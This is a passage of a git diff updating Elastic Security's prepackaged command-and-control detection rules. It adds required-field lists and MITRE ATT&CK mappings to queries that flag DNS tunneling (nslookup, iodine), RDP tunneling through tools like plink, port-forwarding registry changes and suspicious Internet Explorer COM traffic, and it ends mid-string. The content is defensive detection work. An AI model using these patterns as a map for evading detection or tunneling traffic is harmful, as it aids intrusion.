"name": "DNS Activity to the Internet", - "query": "event.category:(network or network_traffic) and (event.type:connection or type:dns) and (destination.port:53 or event.dataset:zeek.dns)\n and source.ip:(\n 10.0.0.0/8 or\n 172.16.0.0/12 or\n 192.168.0.0/16\n ) and\n not destination.ip:(\n 10.0.0.0/8 or\n 127.0.0.0/8 or\n 169.254.0.0/16 or\n 172.16.0.0/12 or\n 192.0.0.0/24 or\n 192.0.0.0/29 or\n 192.0.0.8/32 or\n 192.0.0.9/32 or\n 192.0.0.10/32 or\n 192.0.0.170/32 or\n 192.0.0.171/32 or\n 192.0.2.0/24 or\n 192.31.196.0/24 or\n 192.52.193.0/24 or\n 192.168.0.0/16 or\n 192.88.99.0/24 or\n 224.0.0.0/4 or\n 100.64.0.0/10 or\n 192.175.48.0/24 or\n 198.18.0.0/15 or\n 198.51.100.0/24 or\n 203.0.113.0/24 or\n 240.0.0.0/4 or\n \"::1\" or\n \"FE80::/10\" or\n \"FF00::/8\"\n )\n", - "references": [ - "https://www.us-cert.gov/ncas/alerts/TA15-240A", - "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-81-2.pdf", - "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" - ], - "risk_score": 47, - "rule_id": "6ea71ff0-9e95-475b-9506-2580d1ce6154", - "severity": "medium", - "tags": [ - "Elastic", - "Network", - "Threat Detection", - "Command and Control", - "Host" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0011", - "name": "Command and Control", - "reference": "https://attack.mitre.org/tactics/TA0011/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 12 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json index 2a630beddd367..573fe55e096f4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_tunneling_nslookup.json @@ -17,6 +17,28 @@ "references": [ "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3a59fc81-99d3-47ea-8cd6-d48d561fca20", "severity": "medium", @@ -58,5 +80,5 @@ "value": 15 }, "type": "threshold", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json index f7bd19f63acb6..0479f9bd7fb5a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_download_rar_powershell_from_internet.json @@ -23,6 +23,38 @@ "https://www.justice.gov/opa/press-release/file/1084361/download", "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "url.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "url.path", + "type": "wildcard" + } + ], "risk_score": 47, "rule_id": "ff013cb4-274d-434a-96bb-fe15ddd3ae92", "severity": "medium", @@ -52,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json index d7dd6dcf48762..81e58759a8d74 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_encrypted_channel_freesslcert.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Connection to Commonly Abused Free SSL Certificate Providers", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "network where network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n \n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n \n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "note": "", + "query": "network where network.protocol == \"dns\" and\n /* Add new free SSL certificate provider domains here */\n dns.question.name : (\"*letsencrypt.org\", \"*.sslforfree.com\", \"*.zerossl.com\", \"*.freessl.org\") and\n\n /* Native Windows process paths that are unlikely to have network connections to domains secured using free SSL certificates */\n process.executable : (\"C:\\\\Windows\\\\System32\\\\*.exe\",\n \"C:\\\\Windows\\\\System\\\\*.exe\",\n\t \"C:\\\\Windows\\\\SysWOW64\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\*.exe\",\n\t\t \"C:\\\\Windows\\\\explorer.exe\",\n\t\t \"C:\\\\Windows\\\\notepad.exe\") and\n\n /* Insert noisy false positives here */\n not process.name : (\"svchost.exe\", \"MicrosoftEdge*.exe\", \"msedge.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e3cf38fa-d5b8-46cc-87f9-4a7513e4281d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json index f86a96c81460c..46ff46cab40b9 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_iexplore_via_com.json @@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Potential Command and Control via Internet Explorer", "query": "sequence by host.id, user.name with maxspan = 5s\n [library where dll.name : \"IEProxy.dll\" and process.name : (\"rundll32.exe\", \"regsvr32.exe\")]\n [process where event.type == \"start\" and process.parent.name : \"iexplore.exe\" and process.parent.args : \"-Embedding\"]\n /* IE started via COM in normal conditions makes few connections, mainly to Microsoft and OCSP related domains, add FPs here */\n [network where network.protocol == \"dns\" and process.name : \"iexplore.exe\" and\n not dns.question.name :\n (\n \"*.microsoft.com\",\n \"*.digicert.com\",\n \"*.msocsp.com\",\n \"*.windowsupdate.com\",\n \"*.bing.com\",\n \"*.identrust.com\",\n \"*.sharepoint.com\",\n \"*.office365.com\",\n \"*.office.com\"\n )\n ] /* with runs=5 */\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "acd611f3-2b93-47b3-a0a3-7723bcc46f6d", "severity": "medium", @@ -66,5 +113,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json similarity index 56% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json index d092c64098648..d8402dfd0fa11 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_iodine_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_linux_iodine_activity.json @@ -18,6 +18,23 @@ "references": [ "https://code.kryo.se/iodine/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "041d4d41-9589-43e2-ba13-5680af75ebc2", "severity": "high", @@ -25,9 +42,27 @@ "Elastic", "Host", "Linux", - "Threat Detection" + "Threat Detection", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json index 064088b20b872..6746b9ef45ad2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_dns_tunneling.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_dns_tunneling.json @@ -22,8 +22,26 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1572", + "name": "Protocol Tunneling", + "reference": "https://attack.mitre.org/techniques/T1572/" + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json similarity index 68% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json index 2d5cb473d7061..d457172fa25b5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_dns_question.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_dns_question.json @@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.004", + "name": "DNS", + "reference": "https://attack.mitre.org/techniques/T1071/004/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json similarity index 73% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json index 3855f35b66895..54cd3729a2347 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_urls.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_urls.json @@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json similarity index 70% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json index 2e2cf7eef4010..55a1663b53d4c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_packetbeat_rare_user_agent.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_ml_packetbeat_rare_user_agent.json @@ -22,8 +22,33 @@ "Elastic", "Network", "Threat Detection", - "ML" + "ML", + "Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } ], "type": "machine_learning", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json index de44bec64afea..036680ee3b276 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_nat_traversal_port_activity.json @@ -17,6 +17,23 @@ "license": "Elastic License v2", "name": "IPSEC NAT Traversal Port Activity", "query": "event.category:(network or network_traffic) and network.transport:udp and destination.port:4500\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "a9cb3641-ff4b-4cdc-a063-b4b8d02a67c7", "severity": "low", @@ -41,5 +58,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json index 8d7d3775c5c42..0ec73073a5d9c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_26_activity.json @@ -21,6 +21,28 @@ "https://unit42.paloaltonetworks.com/unit42-badpatch/", "https://isc.sans.edu/forums/diary/Next+up+whats+up+with+TCP+port+26/25564/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d7e62693-aab9-4f66-a21a-3d79ecdd603d", "severity": "low", @@ -60,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json index 9612afbc6c03d..502aa47c73d76 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_port_forwarding_added_registry.json @@ -12,13 +12,21 @@ "language": "eql", "license": "Elastic License v2", "name": "Port Forwarding Rule Addition", - "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to\nany other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box\nto access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred,\nand inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity\nand there are justifications for this configuration.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Port Forwarding Rule Addition\n\nNetwork port forwarding is a mechanism to redirect incoming TCP connections (IPv4 or IPv6) from the local TCP port to\nany other port number, or even to a port on a remote computer.\n\nAttackers may configure port forwarding rules to bypass network segmentation restrictions, using the host as a jump box\nto access previously unreachable systems.\n\nThis rule monitors the modifications to the `HKLM\\SYSTEM\\*ControlSet*\\Services\\PortProxy\\v4tov4\\` subkeys.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Identify the target host IP address, check the connections originating from the host where the modification occurred,\nand inspect the credentials used.\n - Investigate suspicious login activity, such as unauthorized access and logins from outside working hours and unusual locations.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the Administrator is aware of the activity\nand there are justifications for this configuration.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Delete the port forwarding rule.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\PortProxy\\\\v4tov4\\\\*\"\n", "references": [ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "3535c8bb-3bd5-40f4-ae32-b7cd589d5372", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +54,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json index 1896e52b0c2b5..53ead8cd51597 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_remote_desktop_protocol_from_the_internet.json @@ -20,6 +20,38 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "8c1bdde8-4204-45c0-9e0c-c85ca3902488", "severity": "medium", @@ -76,5 +108,5 @@ "timeline_title": "Comprehensive Network Timeline", "timestamp_override": "event.ingested", "type": "query", - "version": 14 + "version": 15 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json index b9b909f03e272..8a556813971ae 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_rdp_tunnel_plink.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Remote Desktop Tunneling Detected", - "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases,\nranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would\nfilter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP\nconnections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated\nwith tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine network data to determine if the host communicated with external servers using the tunnel.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n- Investigate the command line for the execution of programs that are unrelated to tunneling, like Remote Desktop clients.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Take the necessary actions to disable the tunneling, which can be a process kill, service deletion, registry key\nmodification, etc. Inspect the host to learn which method was used and to determine a response for the case.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Potential Remote Desktop Tunneling Detected\n\nProtocol Tunneling is a mechanism that involves explicitly encapsulating a protocol within another for various use cases,\nranging from providing an outer layer of encryption (similar to a VPN) to enabling traffic that network appliances would\nfilter to reach their destination.\n\nAttackers may tunnel Remote Desktop Protocol (RDP) traffic through other protocols like Secure Shell (SSH) to bypass network restrictions that block incoming RDP\nconnections but may be more permissive to other protocols.\n\nThis rule looks for command lines involving the `3389` port, which RDP uses by default and options commonly associated\nwith tools that perform tunneling.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is 